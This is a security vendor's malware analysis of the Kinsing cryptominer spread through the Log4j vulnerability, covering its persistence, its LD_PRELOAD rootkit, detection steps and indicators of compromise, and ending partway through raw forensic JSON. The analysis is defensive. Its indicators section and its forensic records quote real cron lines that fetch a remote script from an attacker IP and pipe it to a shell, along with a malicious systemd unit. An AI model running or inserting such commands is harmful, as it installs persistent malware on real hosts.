Log4j Kinsing Linux Stealth Malware in the Wild

Malware Linux Security Linux Forensics

Date
December 14, 2021
Author
The Sandfly Security Team

A severe vulnerability in the popular Java Log4j package (CVE-2021-44228) allows remote code execution on Linux and other platforms. Within about a day of being publicized, the cryptomining malware Kinsing was updated to begin spreading rapidly using this vulnerability. The version of this malware also includes a LD_PRELOAD stealth rootkit to hide. This post will detail how this malware works and ways to detect it.

Kinsing Log4j Deploys Stealth Rootkit

Kinsing is a cryptominer and is using the log4j exploit to pull its payload from various servers across the internet. The application that runs the payload can be any that is vulnerable to the log4j exploit (which are many).

The version of Kinsing we're analysing also deployed a LD_PRELOAD rootkit to hide on the host. Standard system tools will not show the malware processes running even though CPU loads are at maximum during operation.

Just a few years ago it would have been uncommon to see a stealth rootkit bundled with malware, but that is no longer the case. Security teams should plan on encountering stealth rootkits on Linux and be prepared to use tactics to decloak and deal with them.

What is interesting about this malware is that it has shown that stealth rootkit deployments on Linux are now standard practice. Just a few years ago it would have been uncommon to see a stealth rootkit bundled with malware, but that is no longer the case. Security teams should plan on encountering stealth rootkits on Linux and be prepared to use tactics to decloak and deal with them.

Sandfly is not affected by this rootkit and shows that the system has many severe problems that need investigation.

Sandfly Detects Kinsing Cryptominer Agentlessly

Kinsing Payload Initialization

The kinsing malware has a script which is executed after being pulled from the host server. This script does the following:

  • Disables iptables and ufw firewalls.

  • Disables the Non-Maskable Interrupt (NMI) watchdog feature.

  • Installs curl, wget or cron if not installed already to help with persistence later.

  • Downloads kinsing executable to /etc/kinsing

  • Downloads stealth rootkit LD_PRELOAD library libsystem.so to /etc/libsystem.so

  • Modifies /etc/ld.so.preload to hold path to rootkit library at /etc/libsystem.so.

  • Downloads kdevtmpfsi as mining engine.

  • Disables and deletes competing cryptomining malware that may be present.

  • Installs a cron entry for persistence.

  • Installs a systemd service (called bot) to restart on reboot for persistence.

  • Clears history and deletes .bash_history in compromised user's home directory.

  • Creates hidden directories under /tmp, /var/tmp or /dev/shm depending on situation.

Cron Persistence

The malware adds a cron entry to call back home and execute the initialization script used to load the malware. You can dump the root user's crontab easily with the command below as root, or use it to dump the crontab of any other user on the system:

crontab -l

crontab -l -u <username> 

Sandfly flagged the cron entry as suspicious and a review of the raw data shows the attempt to pipe a script through the local shell for execution.

Kinsing Malware Cron Entry
Kinsing Raw Cron Persistence Data

This script will re-infect the host if any attempt is made to clean up the system. This script can also be modified by attackers to add new features to be executed by cron as the attackers desire. The entry will be different depending on which command line http client is loaded (curl or wget).

Systemd Persistence

This bot created a malicious systemd entry to ensure it restarted each time the system rebooted. The systemd unit is located at /lib/systemd/system/bot.service and contains the data below.

Malicious Systemd Service Unit

Systemd is notoriously opaque and can be difficult to see all service units, timers and other data it may be hiding. Sandfly has forensic engines designed to analyze systemd and report on suspicious findings. We expect more malware going forward will be hiding themselves inside systemd on Linux for persistence and other malicious purposes.

Warning: Stealth Rootkits Common with Linux Malware

As part of the install, the malware loads up a simple but effective stealth rootkit to hide. The rootkit is commonly called a LD_PRELOAD rootkit and has been discussed here many times. This rootkit is effective and reliable at hiding from casual observation. We have seen this type of rootkit even evade full-blown Endpoint Detection and Response (EDR) products from other vendors. It should not be discounted.

We are seeing this style of rootkit being used often and consider it endemic to Linux at this point. As discussed earlier, security teams should be expecting stealth rootkits to be in play and plan accordingly with their detection and response capabilities.

The rootkit modifies /etc/ld.so.preload and inserts a path the the malicious rootkit library /etc/libsystem.so. This file contains the modified library calls to hide process names and files the malware wants to conceal.

You can try to view this file with system tools and depending on the rootkit, it may or may not work:

cat /etc/ld.so.preload

If you see any paths in this file, they should be investigated. If the /etc/ld.so.preload is showing up in ls listings with data (e.g. size is not zero), but you can't see any data when you use the cat command above, then the rootkit is hiding data from view. See the section below on how to disable it to see what is going on.

Since Sandfly is not affected by this style of rootkit, we were able to quickly flag these files as suspicious.

Malicious Stealth Rootkit /etc/ld.so.preload

The full path is decloaked and shows the suspicious library reference below:

Malicious Stealth Rootkit /etc/ld.so.preload Path

The file of interest is /etc/libsystem.so which was also found:

LD_PRELOAD Stealth Malware Libary Binary

With LD_PRELOAD rootkits a special file is used to intercept normal system calls and return altered data to hide. In the case of this malware, the libsystem.so file is the library doing the intercepting and is the key to the stealth rootkit operation.

Process Initialization

There are two processes started on the host called kinsing and kdevtmpfsi. These two processes are for command and control and cryptomining. They are hidden by the installed rootkit from standard tools.

Below we see kdevtmpfsi flagged for suspicious activity along with raw data showing active connections back to its Command and Control (C2) server.

Kinsing Malware and C2 Server Connection
Kinsing Malware and C2 Server Connection
Kinsing Malware Binary in /etc Directory

The kinsing process is started from /etc/kinsing and the kdevtmpfsi could be in multiple areas depending on how the malware was started. Directories /tmp, /var/tmp or /dev/shm are good places to start looking.

Hidden Dirs

There were a few more things done such as a hidden directory created under /dev/shm/.ICEd-unix which may also be present under /tmp/.ICEd-unix again depending on how the malware was run.

Kinsing Malware Hidden Directory

LD_PRELOAD Stealth Rootkit Deactivation

If you are on a system with kinsing running you won't be able to see the high CPU process in standard system tools with the rootkit active. You can disable LD_PRELOAD rootkits by simply renaming the file containing the malicious LD_PRELOAD library:

mv /etc/ld.so.preload /etc/ld.so.preload.bak

This simple command will decloak the entire rootkit. You can now use tools like lsof, top and ps to see the malicious processes and files.

Cleaning up Kinsing

Although this malware would be technically easy to remove, we never recommend you try to clean up a compromised Linux host. There is simply no way to know what else was done on the host. The best course of action is to isolate the system, backup critical data if not done already, and use a new image that is patched (after you have done root cause analysis to figure out how they got onto the host).

Kinsing + log4j = Tip of the Spear

Cryptominers are often first to adopt new exploits to spread. Although by most standards Kinsing is rather tame, the reality is the log4j vulnerability is extremely severe and can allow attackers to do much worse things than load a cryptominer (such as ransomware).

We strongly recommend you patch all systems immediately and continue to monitor them for signs of compromise. Many software packages have dependencies on the log4j library and could have hidden vulnerabilities for quite some time.

Sandfly can easily find Kinsing and other Linux malware. We have a no-obligation free license you can use today to find this and other malware instantly.

Kinsing Indicators of Compromise

Files Downloaded/Created

/etc/kinsing

/etc/libsystem.so

/tmp/kdevtmpfsi (or /var/tmp, /dev/shm)

/lib/systemd/system/bot.service

/dev/shm/.ICE-d-unix

/tmp/.ICEd-unix

File Modified for LD_PRELOAD Rootkit

/etc/ld.so.preload

Cron Persistence

root crontab entry created:

* * * * * curl http://185[.]191.32.198/lh.sh | bash > /dev/null 2>&1
- Or -
* * * * * wget http://185[.]191.32.198/lh.sh | bash > /dev/null 2>&1

Systemd Service Persistence

/lib/systemd/system/bot.service

[Unit]
Description=Start daemon at boot time
After=
Requires=
[Service]
Type=forking
RestartSec=10s
Restart=always
TimeoutStartSec=5
ExecStart=/etc/kinsing
[Install]
WantedBy=multi-user.target

Kinsing Raw Forensic Data

Below are Sandfly forensic traces from the kinsing malware.

{
  "pid": 7133,
  "uid": 0,
  "euid": 0,
  "name": "file_binary_in_tmp_dir",
  "tags": [
    "attack.id.T1564.001",
    "attack.tactic.defense_evasion",
    "file"
  ],
  "type": "file",
  "engine": "sandfly_engine_file",
  "status": "alert",
  "results": {
    "file": {
      "gid": 0,
      "uid": 0,
      "data": null,
      "date": {
        "created": "2021-12-10T18:50:46Z",
        "accessed": "2021-12-10T18:51:52Z",
        "modified": "2021-12-10T18:50:46Z",
        "created_minutes": 20,
        "accessed_minutes": 19,
        "modified_minutes": 20
      },
      "hash": {
        "md5": "8c6681daba966addd295ad89bf5146af",
        "sha1": "64c558567e9566a6ecb1e97000a63d079348bf4c",
        "sha256": "dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839",
        "sha512": "a94ea9f61481d8d42e38c86067c258d830f6c899e032cd69f1769006ae24bf3be7f1b0071d51ae4d304740129919de113515eac3b7460123e1e01fe949bb6e4e"
      },
      "mode": "0100755",
      "name": "kdevtmpfsi",
      "path": "/tmp/kdevtmpfsi",
      "size": 3930448,
      "flags": {
        "link": false,
        "sgid": false,
        "suid": false,
        "device": false,
        "hidden": false,
        "socket": false,
        "sticky": false,
        "deleted": false,
        "regular": true,
        "directory": false,
        "immutable": false,
        "sgid_root": false,
        "suid_root": false,
        "named_pipe": false,
        "char_device": false
      },
      "inode": 72052,
      "nlink": 1,
      "blocks": 7680,
      "device": 64513,
      "blksize": 4096,
      "entropy": 6.37,
      "rdevice": 0,
      "gid_name": "root",
      "uid_name": "root",
      "extension": "",
      "magic_num": {
        "hex": "7f454c46020101030000",
        "text": "ELF\u0002\u0001\u0001\u0003\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0002\u0000>\u0000",
        "type": "elf",
        "class": "executable_linux",
        "expected_extensions": []
      },
      "path_link": "",
      "path_root": "/tmp/",
      "size_mismatch": false,
      "size_byte_count": 3930448
    },
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "explanation": "The file '/tmp/kdevtmpfsi' was found under '/tmp/' and is a Linux executable type. This is a suspicious location for an executable file on a standard Linux system. It is owned by UID '0' and was created on 2021-12-10T18:50:46Z."
  },
  "end_time": "2021-12-10T19:11:15Z",
  "severity": 3,
  "start_time": "2021-12-10T19:11:15Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}
{
  "pid": 7133,
  "uid": 0,
  "euid": 0,
  "name": "process_network_port_established_running_from_tmp_dir",
  "tags": [
    "attack.id.T1048",
    "attack.id.T1059.004",
    "attack.id.T1095",
    "attack.tactic.command_and_control",
    "attack.tactic.execution",
    "attack.tactic.exfiltration",
    "process"
  ],
  "type": "process",
  "engine": "sandfly_engine_process",
  "status": "alert",
  "results": {
    "process": {
      "cwd": "/",
      "gid": 0,
      "pid": 3872,
      "uid": 0,
      "date": {
        "created": "2021-12-10T18:50:46Z",
        "created_minutes": 21
      },
      "file": {
        "gid": 0,
        "uid": 0,
        "data": null,
        "date": {
          "created": "2021-12-10T18:50:46Z",
          "accessed": "2021-12-10T18:51:52Z",
          "modified": "2021-12-10T18:50:46Z",
          "created_minutes": 21,
          "accessed_minutes": 20,
          "modified_minutes": 21
        },
        "hash": {
          "md5": "8c6681daba966addd295ad89bf5146af",
          "sha1": "64c558567e9566a6ecb1e97000a63d079348bf4c",
          "sha256": "dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839",
          "sha512": "a94ea9f61481d8d42e38c86067c258d830f6c899e032cd69f1769006ae24bf3be7f1b0071d51ae4d304740129919de113515eac3b7460123e1e01fe949bb6e4e"
        },
        "mode": "0100755",
        "name": "kdevtmpfsi",
        "path": "/tmp/kdevtmpfsi",
        "size": 3930448,
        "flags": {
          "link": false,
          "sgid": false,
          "suid": false,
          "device": false,
          "hidden": false,
          "socket": false,
          "sticky": false,
          "deleted": false,
          "regular": true,
          "directory": false,
          "immutable": false,
          "sgid_root": false,
          "suid_root": false,
          "named_pipe": false,
          "char_device": false
        },
        "inode": 72052,
        "nlink": 1,
        "blocks": 7680,
        "device": 64513,
        "blksize": 4096,
        "entropy": 6.37,
        "rdevice": 0,
        "gid_name": "root",
        "uid_name": "root",
        "extension": "",
        "magic_num": {
          "hex": "7f454c46020101030000",
          "text": "ELF\u0002\u0001\u0001\u0003\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0002\u0000>\u0000",
          "type": "elf",
          "class": "executable_linux",
          "expected_extensions": []
        },
        "path_link": "",
        "path_root": "/tmp/",
        "size_mismatch": false,
        "size_byte_count": 3930448
      },
      "hash": {
        "md5": "8c6681daba966addd295ad89bf5146af",
        "sha1": "64c558567e9566a6ecb1e97000a63d079348bf4c",
        "sha256": "dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839",
        "sha512": "a94ea9f61481d8d42e38c86067c258d830f6c899e032cd69f1769006ae24bf3be7f1b0071d51ae4d304740129919de113515eac3b7460123e1e01fe949bb6e4e"
      },
      "maps": [
        "00400000-007b4000 r-xp 00000000 fc:01 72052                              /tmp/kdevtmpfsi",
        "009b4000-009be000 rw-p 003b4000 fc:01 72052                              /tmp/kdevtmpfsi",
        "009be000-00a50000 rw-p 00000000 00:00 0 ",
        "022dd000-02323000 rw-p 00000000 00:00 0                                  [heap]",
        "02323000-02374000 rw-p 00000000 00:00 0                                  [heap]",
        "7f4424000000-7f4424021000 rw-p 00000000 00:00 0 ",
        "7f4424021000-7f4428000000 ---p 00000000 00:00 0 ",
        "7f442bfff000-7f443c000000 rw-p 00000000 00:00 0 ",
        "7f443c000000-7f443c021000 rw-p 00000000 00:00 0 ",
        "7f443c021000-7f4440000000 ---p 00000000 00:00 0 ",
        "7f4443400000-7f4443600000 rw-p 00000000 00:0f 45687                      /anon_hugepage (deleted)",
        "7f44437ff000-7f4443800000 ---p 00000000 00:00 0 ",
        "7f4443800000-7f4444000000 rw-p 00000000 00:00 0 ",
        "7f4444000000-7f4444021000 rw-p 00000000 00:00 0 ",
        "7f4444021000-7f4448000000 ---p 00000000 00:00 0 ",
        "7f444822d000-7f444826d000 rwxp 00000000 00:00 0 ",
        "7f444826d000-7f444826e000 ---p 00000000 00:00 0 ",
        "7f444826e000-7f4448a6e000 rw-p 00000000 00:00 0 ",
        "7f4448a6e000-7f4448a6f000 ---p 00000000 00:00 0 ",
        "7f4448a6f000-7f444926f000 rw-p 00000000 00:00 0 ",
        "7f444926f000-7f4449270000 ---p 00000000 00:00 0 ",
        "7f4449270000-7f4449a70000 rw-p 00000000 00:00 0 ",
        "7f4449a70000-7f4449a71000 ---p 00000000 00:00 0 ",
        "7f4449a71000-7f444a271000 rw-p 00000000 00:00 0 ",
        "7f444a271000-7f444a272000 ---p 00000000 00:00 0 ",
        "7f444a272000-7f444aa72000 rw-p 00000000 00:00 0 ",
        "7f444aa72000-7f444aa86000 r-xp 00000000 00:00 0 ",
        "7ffc5cc22000-7ffc5cc43000 rw-p 00000000 00:00 0                          [stack]",
        "7ffc5cd83000-7ffc5cd86000 r--p 00000000 00:00 0                          [vvar]",
        "7ffc5cd86000-7ffc5cd87000 r-xp 00000000 00:00 0                          [vdso]",
        "ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]"
      ],
      "name": "kdevtmpfsi",
      "path": "/tmp/kdevtmpfsi",
      "pgid": 3872,
      "ppid": 1,
      "flags": {
        "hidden": false,
        "deleted": false,
        "immutable": false,
        "containerized": false
      },
      "stack": [
        "ep_poll+0x400/0x450",
        "do_epoll_wait+0xb8/0xd0",
        "__x64_sys_epoll_wait+0x1e/0x30",
        "do_syscall_64+0x57/0x190",
        "entry_SYSCALL_64_after_hwframe+0x44/0xa9"
      ],
      "state": "S",
      "cgroup": [
        {
          "path": "/",
          "hierarchy_id": "12",
          "controller_list": "rdma"
        },
        {
          "path": "/",
          "hierarchy_id": "11",
          "controller_list": "perf_event"
        },
        {
          "path": "/user.slice",
          "hierarchy_id": "10",
          "controller_list": "blkio"
        },
        {
          "path": "/user.slice/user-0.slice/session-1.scope",
          "hierarchy_id": "9",
          "controller_list": "memory"
        },
        {
          "path": "/user.slice",
          "hierarchy_id": "8",
          "controller_list": "devices"
        },
        {
          "path": "/",
          "hierarchy_id": "7",
          "controller_list": "freezer"
        },
        {
          "path": "/",
          "hierarchy_id": "6",
          "controller_list": "hugetlb"
        },
        {
          "path": "/",
          "hierarchy_id": "5",
          "controller_list": "cpuset"
        },
        {
          "path": "/user.slice/user-0.slice/session-1.scope",
          "hierarchy_id": "4",
          "controller_list": "pids"
        },
        {
          "path": "/user.slice",
          "hierarchy_id": "3",
          "controller_list": "cpu,cpuacct"
        },
        {
          "path": "/",
          "hierarchy_id": "2",
          "controller_list": "net_cls,net_prio"
        },
        {
          "path": "/user.slice/user-0.slice/session-1.scope",
          "hierarchy_id": "1",
          "controller_list": "name=systemd"
        },
        {
          "path": "/user.slice/user-0.slice/session-1.scope",
          "hierarchy_id": "0",
          "controller_list": ""
        }
      ],
      "cmdline": "/tmp/kdevtmpfsi",
      "command": "kdevtmpfsi",
      "entropy": 6.37,
      "environ": [
        "LESSOPEN=| /usr/bin/lesspipe %s",
        "SKL=lh",
        "USER=root",
        "SSH_CLIENT=192.168.1.1 30396 22",
        "LC_TIME=en_US.UTF-8",
        "XDG_SESSION_TYPE=tty",
        "SHLVL=2",
        "MOTD_SHOWN=pam",
        "HOME=/root",
        "SSH_TTY=/dev/pts/0",
        "LC_MONETARY=en_US.UTF-8",
        "DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/0/bus",
        "LOGNAME=root",
        "_=/etc/kinsing",
        "XDG_SESSION_CLASS=user",
        "TERM=xterm-256color",
        "XDG_SESSION_ID=1",
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin",
        "LC_ADDRESS=en_US.UTF-8",
        "XDG_RUNTIME_DIR=/run/user/0",
        "LANG=C.UTF-8",
        "LC_TELEPHONE=en_US.UTF-8",
        "LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:",
        "D=FALSE",
        "SHELL=/bin/bash",
        "LC_NAME=en_US.UTF-8",
        "LESSCLOSE=/usr/bin/lesspipe %s %s",
        "LC_MEASUREMENT=en_US.UTF-8",
        "LC_IDENTIFICATION=en_US.UTF-8",
        "PWD=/root",
        "SSH_CONNECTION=192.168.1.1 30396 10.1.1.1 22",
        "XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop",
        "LC_NUMERIC=en_US.UTF-8",
        "LC_PAPER=en_US.UTF-8",
        ""
      ],
      "gid_name": "root",
      "uid_name": "root",
      "container": {
        "id": "",
        "id_short": "",
        "upperdir": "",
        "workingdir": ""
      },
      "extension": "",
      "network_ports": {
        "raw": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "tcp": {
          "listening": false,
          "operating": true,
          "connections": [
            {
              "port_local": 53992,
              "port_remote": 80,
              "ip_address_local": "10.1.1.1",
              "ip_address_remote": "45.129.2.107"
            }
          ],
          "established": true,
          "listening_num": 0,
          "established_num": 1
        },
        "udp": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "icmp": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "raw6": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "sctp": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "tcp6": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "udp6": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "icmp6": {
          "listening": false,
          "operating": false,
          "connections": null,
          "established": false,
          "listening_num": 0,
          "established_num": 0
        },
        "listening": false,
        "operating": true,
        "established": true,
        "listening_num": 0,
        "established_num": 1
      },
      "system_uptime": "2021-12-10T18:41:31Z",
      "file_descriptors": [
        {
          "path": "socket:[45676]",
          "type": "socket",
          "class": "tcp",
          "number": 11
        },
        {
          "path": "/tmp/.ICEd-unix/051276057 (deleted)",
          "type": "unknown",
          "class": "unknown",
          "number": 2
        },
        {
          "path": "/",
          "type": "unknown",
          "class": "unknown",
          "number": 3
        },
        {
          "path": "pipe:[45673]",
          "type": "pipe",
          "class": "device",
          "number": 4
        },
        {
          "path": "anon_inode:[eventpoll]",
          "type": "unknown",
          "class": "unknown",
          "number": 6
        },
        {
          "path": "anon_inode:[eventfd]",
          "type": "unknown",
          "class": "unknown",
          "number": 9
        },
        {
          "path": "/dev/null",
          "type": "block",
          "class": "device",
          "number": 0
        },
        {
          "path": "/tmp/.ICEd-unix/051276057 (deleted)",
          "type": "unknown",
          "class": "unknown",
          "number": 1
        },
        {
          "path": "/dev/null",
          "type": "block",
          "class": "device",
          "number": 10
        },
        {
          "path": "pipe:[45673]",
          "type": "pipe",
          "class": "device",
          "number": 5
        },
        {
          "path": "pipe:[45674]",
          "type": "pipe",
          "class": "device",
          "number": 7
        },
        {
          "path": "pipe:[45674]",
          "type": "pipe",
          "class": "device",
          "number": 8
        }
      ]
    },
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "explanation": "The process name 'kdevtmpfsi' with PID '3872' has an active network connection and is running out of the location '/tmp/kdevtmpfsi'. This is a suspicious location for a network process to be running and may be malicious."
  },
  "end_time": "2021-12-10T19:12:38Z",
  "severity": 3,
  "start_time": "2021-12-10T19:12:38Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}
{
  "pid": 7133,
  "uid": 0,
  "euid": 0,
  "name": "file_binary_in_etc_dir",
  "tags": [
    "attack.id.T1564.001",
    "attack.tactic.defense_evasion",
    "file"
  ],
  "type": "file",
  "engine": "sandfly_engine_file",
  "status": "alert",
  "results": {
    "file": {
      "gid": 0,
      "uid": 0,
      "data": null,
      "date": {
        "created": "2021-12-10T18:49:44Z",
        "accessed": "2021-12-10T18:49:44Z",
        "modified": "2021-12-10T18:49:44Z",
        "created_minutes": 21,
        "accessed_minutes": 21,
        "modified_minutes": 21
      },
      "hash": {
        "md5": "ccef46c7edf9131ccffc47bd69eb743b",
        "sha1": "38c56b5e1489092b80c9908f04379e5a16876f01",
        "sha256": "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a",
        "sha512": "da452f1022e7ba6e5b958d39d3e5d0418339d55bf8b2ad8cfc9e25a43ad61b6e992df9df97b75d64a22a5b8dde35308f4934d7b0c591bb460526bf24ead808cc"
      },
      "mode": "0100777",
      "name": "libsystem.so",
      "path": "/etc/libsystem.so",
      "size": 26800,
      "flags": {
        "link": false,
        "sgid": false,
        "suid": false,
        "device": false,
        "hidden": false,
        "socket": false,
        "sticky": false,
        "deleted": false,
        "regular": true,
        "directory": false,
        "immutable": false,
        "sgid_root": false,
        "suid_root": false,
        "named_pipe": false,
        "char_device": false
      },
      "inode": 72037,
      "nlink": 1,
      "blocks": 56,
      "device": 64513,
      "blksize": 4096,
      "entropy": 3.85,
      "rdevice": 0,
      "gid_name": "root",
      "uid_name": "root",
      "extension": ".so",
      "magic_num": {
        "hex": "7f454c46020101000000",
        "text": "ELF\u0002\u0001\u0001\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0003\u0000>\u0000",
        "type": "elf",
        "class": "executable_linux",
        "expected_extensions": []
      },
      "path_link": "",
      "path_root": "/etc/",
      "size_mismatch": false,
      "size_byte_count": 26800
    },
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "explanation": "The file '/etc/libsystem.so' was found under '/etc/' and is a Linux executable type. This is a suspicious location for an executable file on a standard Linux system. It is owned by UID '0' and was created on 2021-12-10T18:49:44Z."
  },
  "end_time": "2021-12-10T19:11:15Z",
  "severity": 3,
  "start_time": "2021-12-10T19:11:15Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}
{
  "pid": 7133,
  "uid": 0,
  "euid": 0,
  "name": "process_persistence_cron_malicious",
  "tags": [
    "attack.id.T1053.003",
    "attack.tactic.execution",
    "attack.tactic.persistence",
    "process"
  ],
  "type": "process",
  "engine": "sandfly_engine_cron",
  "status": "alert",
  "results": {
    "cron": {
      "day": "*",
      "hour": "*",
      "path": "/var/spool/cron/crontabs/root",
      "entry": "* * * * * wget -q -O - http://185.191.32.198/unk.sh | sh > /dev/null 2>&1",
      "month": "*",
      "minute": "*",
      "command": "wget -q -O - http://185.191.32.198/unk.sh | sh > /dev/null 2>&1",
      "username": "root",
      "day_of_week": "*"
    },
    "file": {
      "gid": 105,
      "uid": 0,
      "data": null,
      "date": {
        "created": "2021-12-10T18:51:19Z",
        "accessed": "2021-12-10T18:51:52Z",
        "modified": "2021-12-10T18:51:19Z",
        "created_minutes": 21,
        "accessed_minutes": 20,
        "modified_minutes": 21
      },
      "hash": {
        "md5": "7bd7d3febde10a3aff98ec0b580f0e69",
        "sha1": "51039ab63fa15f3f5d57bb294e8c40c5bf831021",
        "sha256": "80a81d1141892defa24f5c057f37b203e437e38cf9257b131fca257779602079",
        "sha512": "6dc3ac9399d1ed04bde72deb9813f6a895cf3474442cc648480b35872e2aec981f75f8533ff9a122007e9a04a791af06e25ab44f87a5ffad9d03a6def2933945"
      },
      "mode": "0100600",
      "name": "root",
      "path": "/var/spool/cron/crontabs/root",
      "size": 249,
      "flags": {
        "link": false,
        "sgid": false,
        "suid": false,
        "device": false,
        "hidden": false,
        "socket": false,
        "sticky": false,
        "deleted": false,
        "regular": true,
        "directory": false,
        "immutable": false,
        "sgid_root": false,
        "suid_root": false,
        "named_pipe": false,
        "char_device": false
      },
      "inode": 72040,
      "nlink": 1,
      "blocks": 8,
      "device": 64513,
      "blksize": 4096,
      "entropy": 5.15,
      "rdevice": 0,
      "gid_name": "crontab",
      "uid_name": "root",
      "extension": "",
      "magic_num": {
        "hex": "2320444f204e4f542045",
        "text": "# DO NOT EDIT THIS F",
        "type": "unknown",
        "class": "unknown",
        "expected_extensions": null
      },
      "path_link": "",
      "path_root": "/var/spool/cron/crontabs/",
      "size_mismatch": false,
      "size_byte_count": 249
    },
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "explanation": "The cronfile '/var/spool/cron/crontabs/root' contains a command ('wget -q -O - http://185.191.32.198/unk.sh | sh > /dev/null 2>&1') that indicates it may be used for malicious persistence purposes. Cron files that contain references to temp directories, wget, curl, or commands sent to shells are often done by malware. Check the cron command entry for specifics on what was found."
  },
  "end_time": "2021-12-10T19:12:38Z",
  "severity": 3,
  "start_time": "2021-12-10T19:12:38Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}
{
  "pid": 4009,
  "uid": 0,
  "euid": 0,
  "name": "file_ld_so_preload_non_empty",
  "tags": [
    "attack.id.T1574.006",
    "attack.tactic.defense_evasion",
    "attack.tactic.execution",
    "attack.tactic.privilege_escalation",
    "file"
  ],
  "type": "file",
  "engine": "sandfly_engine_file",
  "status": "alert",
  "results": {
    "file": {
      "gid": 0,
      "uid": 0,
      "data": [
        "/etc/libsystem.so"
      ],
      "date": {
        "created": "2021-12-10T18:50:33Z",
        "accessed": "2021-12-10T18:50:33Z",
        "modified": "2021-12-10T18:50:33Z",
        "created_minutes": 2,
        "accessed_minutes": 2,
        "modified_minutes": 2
      },
      "hash": {
        "md5": "9a010777faf82d8f9ce01add8a1908d7",
        "sha1": "d2b79575e55d6ba31a2834a939dede80aa04e99a",
        "sha256": "fea3a22c10711f505b5c54930257702bbf5a702ae309624e77ea0f086bc1876c",
